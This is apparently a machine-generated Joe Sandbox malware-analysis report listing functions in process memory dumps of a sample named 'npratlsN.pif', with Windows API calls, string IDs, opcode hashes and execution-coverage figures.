Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ef868d664fd6c2c42c2a5ccdd45922103b546e56e39d3c5aad4fda8f8728626
Instruction ID: 40020f687adc6a3752635a6eec1ca94e661bea32668d68084031906288f1fbf2
Opcode Fuzzy Hash: 7ef868d664fd6c2c42c2a5ccdd45922103b546e56e39d3c5aad4fda8f8728626
Instruction Fuzzy Hash: 14A1F4A67916000BD719BA7D9C843AEB3D2DBC4325F98827EE11DCB381EB78C9438651

Function 027894EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027895DA), ref: 02789572
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027895DA), ref: 02789578

Strings

yyyy, xrefs: 0278954D

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 7442f13b34bc66b22d511bbe9dbdccabb134445b46cdeb50af1031c6ca7b9725
Instruction ID: e571926c7ce72bc26be4f701353798a5bd16cd0591dfc72881648aa5724e26b9
Opcode Fuzzy Hash: 7442f13b34bc66b22d511bbe9dbdccabb134445b46cdeb50af1031c6ca7b9725
Instruction Fuzzy Hash: 28215C71A40268EFDB11EFA8C995ABEB3F9EF09710F5100A5E905E7380E7709E40CB65

Function 02798204 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0279828E), ref: 02798270

Strings

FlushInstructionCache, xrefs: 0279821D
Kernel32, xrefs: 0279824F

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 59ac3e4abe1646c340e048cf23b8f0634a3199996f8396d1d144fd65a7473810
Instruction ID: c67f194ffde36ac0d06f328caef704495eca40a8ece508b37fbbf0da12df156d
Opcode Fuzzy Hash: 59ac3e4abe1646c340e048cf23b8f0634a3199996f8396d1d144fd65a7473810
Instruction Fuzzy Hash: 42018171680708BFEB11EFA8EC55F5B77EDEB4AB00F524460F504D7640D670AD109B26

Function 0279ADDC Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0279AE10
IsBadWritePtr.KERNEL32(?,00000004), ref: 0279AE40
IsBadReadPtr.KERNEL32(?,00000008), ref: 0279AE5F
IsBadReadPtr.KERNEL32(?,00000004), ref: 0279AE6B

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: e720fd1f35371ed8eed611904540eb1dceb651114ec14aff2087e2dc2d652641
Instruction ID: 701a92815e1efda5156eadca61d59bc25e8bd940455bb2e92d1826e6819aabce
Opcode Fuzzy Hash: e720fd1f35371ed8eed611904540eb1dceb651114ec14aff2087e2dc2d652641
Instruction Fuzzy Hash: 7321D371A4171AABDF10DF29EC85BAE73ADEF80720F008111ED5497385D734E9118BA4

Analysis Process: npratlsN.pifPID: 7716, Parent PID: 7368COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	51.2%
Signature Coverage:	15%
Total number of Nodes:	453
Total number of Limit Nodes:	43

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

___, xrefs: 0040227D
!, xrefs: 0040201A
h, xrefs: 00401A6F
W, xrefs: 00401B14
o, xrefs: 00401B8D
D, xrefs: 00401DFB
{, xrefs: 00401E3C
U, xrefs: 004020F5
V, xrefs: 00401E19
", xrefs: 00401B0F
W, xrefs: 00401B23
[, xrefs: 00401B37
W, xrefs: 00402033
o, xrefs: 00402097
8, xrefs: 00401BA9
., xrefs: 00401B0A
x, xrefs: 00401B78
., xrefs: 0040201F
!, xrefs: 004020CF
{, xrefs: 00401B4B
x, xrefs: 00402088
_._, xrefs: 00402257
{, xrefs: 0040205B
v, xrefs: 0040206A
W, xrefs: 004020E6
*, xrefs: 004020E1
', xrefs: 00402006
4, xrefs: 00401B64
5, xrefs: 00402109
), xrefs: 0040202E
o, xrefs: 00402159
0, xrefs: 00401BBD
:, xrefs: 00401B28
v, xrefs: 00401E4B
%, xrefs: 004020FA
4, xrefs: 00402136
E, xrefs: 00401E0F
{, xrefs: 0040211D
x, xrefs: 0040214A
', xrefs: 00401AF6
4, xrefs: 00402074
*, xrefs: 00401A1F
!, xrefs: 00401B1E
V, xrefs: 00402038
6, xrefs: 004020C5
v, xrefs: 0040212C
x, xrefs: 00401E69
v, xrefs: 00401B5A
[, xrefs: 00402047

Memory Dump Source

Source File: 0000000D.00000002.3820648625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3820648625.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.3820648625.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_npratlsN.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 1F905E58 Relevance: 6.7, Strings: 5, Instructions: 447
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(osq, xrefs: 1F9060A2
(osq, xrefs: 1F9060B0
(osq, xrefs: 1F9063CD
,wq, xrefs: 1F90611A
,wq, xrefs: 1F906128

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: (osq$(osq$(osq$,wq$,wq
API String ID: 0-1903262254
Opcode ID: 439c5ecd17b78d0bc02a5fe92d962b84a86593febd76e3a6429198d1c43a028a
Instruction ID: d3efd7a5794dbd84e539b366896ffc089072575dfa121ec2fced45b0f5b1e13f
Opcode Fuzzy Hash: 439c5ecd17b78d0bc02a5fe92d962b84a86593febd76e3a6429198d1c43a028a
Instruction Fuzzy Hash: 710264B1A00219CFCB11EF69C984A9DBBFAFF85310F258469E405AB2A1D734ED45CF90

Function 1F90AA58 Relevance: 6.6, Strings: 5, Instructions: 350
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjVp, xrefs: 1F90AE24
PHsq, xrefs: 1F90AE86
PHsq, xrefs: 1F90AE97
LjVp, xrefs: 1F90AE0E
0oVp, xrefs: 1F90ACA1

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 8dca88d22628422def7bde92edf61b247425226f98a4ddc3e5b4a91626e65131
Instruction ID: 3fcaed608e8cb9f453648c148e6d8789c30e325e01fc1bc3c639c0cf61ffc5ff
Opcode Fuzzy Hash: 8dca88d22628422def7bde92edf61b247425226f98a4ddc3e5b4a91626e65131
Instruction Fuzzy Hash: 23E11F75E00218CFDB15EFA9C984A9DBBB6FF49310F1581A9D909AB3A1D734E841CF90

Function 1F90B7A2 Relevance: 6.4, Strings: 5, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjVp, xrefs: 1F90B98E
PHsq, xrefs: 1F90BA17
0oVp, xrefs: 1F90B821
PHsq, xrefs: 1F90BA06
LjVp, xrefs: 1F90B9A4

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 31dc6f480604b0a581a418c93296037d84ab30144143a566c9c4d82e0833d21e
Instruction ID: 9a829160e35950f1f7dcd970260e92ff6c4df9c270205390009f52e78ab87ce7
Opcode Fuzzy Hash: 31dc6f480604b0a581a418c93296037d84ab30144143a566c9c4d82e0833d21e
Instruction Fuzzy Hash: FC81D574E04218CFDB14DFA9C984A9DBBF6BF89304F14D169E519AB3A5DB309841CF50

Function 1F90AF00 Relevance: 6.4, Strings: 5, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHsq, xrefs: 1F90B177
LjVp, xrefs: 1F90B0EE
PHsq, xrefs: 1F90B166
0oVp, xrefs: 1F90AF81
LjVp, xrefs: 1F90B104

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: d7c35f9ce120ac0521a24c481cdea44310c9846eacea909f46bd18c2ef9630f6
Instruction ID: ed290943961f65ca877829f079a9ba229cc5c20d5ea4deb0b6fc3ce2ec7410dc
Opcode Fuzzy Hash: d7c35f9ce120ac0521a24c481cdea44310c9846eacea909f46bd18c2ef9630f6
Instruction Fuzzy Hash: F081D474E00218CFDB14DFAAC984A9DBBF6BF89300F14C169E419AB3A5DB309985CF50

Function 1F90B4BF Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjVp, xrefs: 1F90B6C4
PHsq, xrefs: 1F90B737
PHsq, xrefs: 1F90B726
LjVp, xrefs: 1F90B6AE
0oVp, xrefs: 1F90B541

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: f55299187c6b854ce3c3d7e705190d6f06fa9fd1f7b8fa38588e23b4eb4cacab
Instruction ID: f0ff0d5d68ff26caa4b1632b586dd9aee7bee2f9125fe3854178fe07bc65fe41
Opcode Fuzzy Hash: f55299187c6b854ce3c3d7e705190d6f06fa9fd1f7b8fa38588e23b4eb4cacab
Instruction Fuzzy Hash: E981C4B4E00218CFDB14DFA9C994A9DBBF6BF89310F14D169E419AB365DB30A981CF50

Function 1F90BA81 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjVp, xrefs: 1F90BC6E
0oVp, xrefs: 1F90BB01
PHsq, xrefs: 1F90BCF7
LjVp, xrefs: 1F90BC84
PHsq, xrefs: 1F90BCE6

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: cd5524090c629db7c1a1cdffd5c7eda14e53d5358c2b2635fe8bf9588fc5c5ba
Instruction ID: 10da22bdbd5a442836d9bd824ca609c8ff30440492569202a650658de9025dc6
Opcode Fuzzy Hash: cd5524090c629db7c1a1cdffd5c7eda14e53d5358c2b2635fe8bf9588fc5c5ba
Instruction Fuzzy Hash: 6881B574E04218DFDB14DFA9C994A9DBBF6BF89300F14C169E819AB365DB309885CF50

Function 1F90BD5F Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHsq, xrefs: 1F90BFD7
LjVp, xrefs: 1F90BF4E
0oVp, xrefs: 1F90BDE1
LjVp, xrefs: 1F90BF64
PHsq, xrefs: 1F90BFC6

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 4cdfa2bba54587b0c7d05b4403d84bf095ed154e0180cdb4749956b2f717e7b4
Instruction ID: d3303df2b90ec06920a7ab146f20ee413c0c61a37c105fdd9f1885af0c8e70c3
Opcode Fuzzy Hash: 4cdfa2bba54587b0c7d05b4403d84bf095ed154e0180cdb4749956b2f717e7b4
Instruction Fuzzy Hash: B981D674E00218CFDB14EFAAC984A9DBBF6BF89300F14D169E919AB355DB30A941CF50

Function 1F90B1E1 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHsq, xrefs: 1F90B457
LjVp, xrefs: 1F90B3E4
0oVp, xrefs: 1F90B261
PHsq, xrefs: 1F90B446
LjVp, xrefs: 1F90B3CE

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 85622f39a2883c9ea770557cc4d884dc2e221af231dbc8ca247f914261997fa3
Instruction ID: e64bf20764da012fc677abe90214b365c55dcb9cd4725c54a6d9a0bdd36e73c6
Opcode Fuzzy Hash: 85622f39a2883c9ea770557cc4d884dc2e221af231dbc8ca247f914261997fa3
Instruction Fuzzy Hash: 1E81C574E05218CFDB14DFA9C994A9EBBF6BF89300F24C169E819AB355DB30A941CF50

Function 1F9041E1 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHsq, xrefs: 1F904458
LjVp, xrefs: 1F9043CF
LjVp, xrefs: 1F9043E5
PHsq, xrefs: 1F904447
0oVp, xrefs: 1F904261

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
API String ID: 0-1434930255
Opcode ID: 752d4319ed8da58119778e60429dcc3c8384ef37e616fb17c154c7e13f584fbf
Instruction ID: eac055bd6e063bee40ac6d4bc9dff2f6472947b19c8b99008b6076346b29f5c2
Opcode Fuzzy Hash: 752d4319ed8da58119778e60429dcc3c8384ef37e616fb17c154c7e13f584fbf
Instruction Fuzzy Hash: 62819474E01218CFDB14DFAAC984A9DBBF6BF89300F10D169E819AB365DB30A945CF50

Function 1F90AC20 Relevance: 3.9, Strings: 3, Instructions: 155COMMON

Download Yara Rule

Strings

PHsq, xrefs: 1F90AE86
PHsq, xrefs: 1F90AE97
0oVp, xrefs: 1F90ACA1

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: 0oVp$PHsq$PHsq
API String ID: 0-255689168
Opcode ID: 76477477fd146da620bd3ef20e0f69664223195c4b7eab5a539c4e5d610421bb
Instruction ID: 7a673c4a34f2e5ef3b7552bb845a6510de10187ee3ca1876ad7fd451ee60ca95
Opcode Fuzzy Hash: 76477477fd146da620bd3ef20e0f69664223195c4b7eab5a539c4e5d610421bb
Instruction Fuzzy Hash: C561B3B4E002188FDB18DFAAC984A9DBBF6FF89300F10D169D419AB3A5DB345846CF50

Function 1F908F88 Relevance: 3.4, Strings: 2, Instructions: 856COMMON

Download Yara Rule

Strings

4'sq, xrefs: 1F9099A3
(osq, xrefs: 1F9093A8

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: (osq$4'sq
API String ID: 0-2651803416
Opcode ID: fe309931ce5a69727237d344f3c2eac4659319d0f9d06c87437ad8987366f44a
Instruction ID: efbfc598dacc273744b5aa7287330bc16da0f7b178af9929a24ec54ceaeac630
Opcode Fuzzy Hash: fe309931ce5a69727237d344f3c2eac4659319d0f9d06c87437ad8987366f44a
Instruction Fuzzy Hash: E9729F70A0425ADFCB15EF68C984A9EBBFAFF88310F118559E916DB3A1D730E941CB50

Function 1F905820 Relevance: 3.0, Strings: 2, Instructions: 520COMMON

Download Yara Rule

Strings

(osq, xrefs: 1F905D66
Hwq, xrefs: 1F905C32

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID: (osq$Hwq
API String ID: 0-1668724233
Opcode ID: e4f8216f24eb9b40808b8ee56e9e458de9c0a85f5ece35cb73434e56382bd75d
Instruction ID: 430669d477129db6060b4081e09b3e02d5dba6e0f7f6d47f73641d7a2d31148e
Opcode Fuzzy Hash: e4f8216f24eb9b40808b8ee56e9e458de9c0a85f5ece35cb73434e56382bd75d
Instruction Fuzzy Hash: 7D127174A002199FCB05EF69C894A9EBBBAFFC8300F14856DE545DB391EB34AD45CB50

Function 209D6C18 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

PHsq, xrefs: 209D6E52
PHsq, xrefs: 209D6E63

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID: PHsq$PHsq
API String ID: 0-3507005907
Opcode ID: 0b64738eab6e6490507cb473e97a327f6d2883b766022f184b8d9ae2b50961ae
Instruction ID: fbb40866c3f0cf1e7a38f3f081e28b145f9518b49eb8a12723275ceb2b507091
Opcode Fuzzy Hash: 0b64738eab6e6490507cb473e97a327f6d2883b766022f184b8d9ae2b50961ae
Instruction Fuzzy Hash: DE81B0B5E00218CFDB58DFAAD994B9DBBF2BF89300F20806AD409AB394DB345945CF50

Function 2129BDF8 Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3865585011.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_21290000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a489101e3105b99cbb3ae40a3757912719d7d9ebf7687fc169bd987dc84fe73d
Instruction ID: 4759cbe0df81b55a2e12739348837afe50479a549475f93ed701571300ae0e33
Opcode Fuzzy Hash: a489101e3105b99cbb3ae40a3757912719d7d9ebf7687fc169bd987dc84fe73d
Instruction Fuzzy Hash: E4F16D70A0020ACFDB14CFA9CD85B9DBBF1BF49314F258169E509AB3A5DB70A945CB90

Function 209C7A28 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863909598.00000000209C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209c0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07fcf30ece09b5789133aa022c1a2ed39d36d1bf77da26c93a19c2b6fd30d498
Instruction ID: 5c057dcae7d212525c278bfb6afe0d6a83bf915bad9c1e4271fbca31671e0e51
Opcode Fuzzy Hash: 07fcf30ece09b5789133aa022c1a2ed39d36d1bf77da26c93a19c2b6fd30d498
Instruction Fuzzy Hash: BAF1F574D01218CFDB14CFA9C984B9DFBB2BF48304F1091A9E809AB355DB759986CF51

Function 20A8C770 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864442464.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a80000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b35d36a0a1f99cab644b65bb16a0675ac2a0ebe2a6e5ce508774ccf604fa1820
Instruction ID: f4723c771b038ebf161a324e856538f860486a478220a368b9019546c2b6e2b8
Opcode Fuzzy Hash: b35d36a0a1f99cab644b65bb16a0675ac2a0ebe2a6e5ce508774ccf604fa1820
Instruction Fuzzy Hash: B1827C74E012288FDB64DF69C994BDDBBB2BB89300F1081EAD90DA7261DB315E85CF45

Function 1F90F0D7 Relevance: .7, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3862016957.000000001F900000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1f900000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da9d9cc40613d9d838f0e3235db7ec504ea854b3cccfcbcbfc81cecfa79d5982
Instruction ID: 1d9815d68fd2414b0162cd514af3b67542d59272530ae4b01a10493b3d308b6b
Opcode Fuzzy Hash: da9d9cc40613d9d838f0e3235db7ec504ea854b3cccfcbcbfc81cecfa79d5982
Instruction Fuzzy Hash: 3B72D274E012298FDB65EF69C984BDDBBB6BB49304F1091E9D409A7291D730AEC2CF40

Function 20A44908 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb3e27351c301c650f496f3c46c8689fb3d55fc0e7e8a375e83df92e5f81143
Instruction ID: 194423b1ce47495a2eaede67eaa38a8c8e828af691c6612135fc3210f7c1831c
Opcode Fuzzy Hash: cdb3e27351c301c650f496f3c46c8689fb3d55fc0e7e8a375e83df92e5f81143
Instruction Fuzzy Hash: FCE1BEB4E01218CFDB24DFA5C984B9DBBB2BF89304F2081A9E509B7391DB355A85CF51

Function 209D65C0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3863969597.00000000209D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 209D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_209d0000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b301325d398f0217e70e053a27f43d63f9744260985bb75c1256b3eeb8805b0
Instruction ID: f69683ccec3c93ef2d6bc52bdc4e0f04f7c925d26b2cb68c21b129d693740751
Opcode Fuzzy Hash: 3b301325d398f0217e70e053a27f43d63f9744260985bb75c1256b3eeb8805b0
Instruction Fuzzy Hash: 39E1A0B4E01218CFEB14DFA5C984B9DBBB2BF89305F2081A9D409BB391DB355A85CF54

Function 20A44FA8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864127224.0000000020A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_20a40000_npratlsN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8591437298a5381734c839f1d6105bc57160786f4d440bc8dce68fd5d8661f
Instruction ID: b88f9fbb0aa00a62253ffe030a96d59f2513eae2417e4795d6824f41fe1a1262
Opcode Fuzzy Hash: fe8591437298a5381734c839f1d6105bc57160786f4d440bc8dce68fd5d8661f
Instruction Fuzzy Hash: A9D1AF78E00228CFDB14DFA5C994B9DBBB2BF89340F6081A9D409AB395DB355E85CF50

Function 20A709D0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3864345582.0000000020A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A70000, based on PE: false

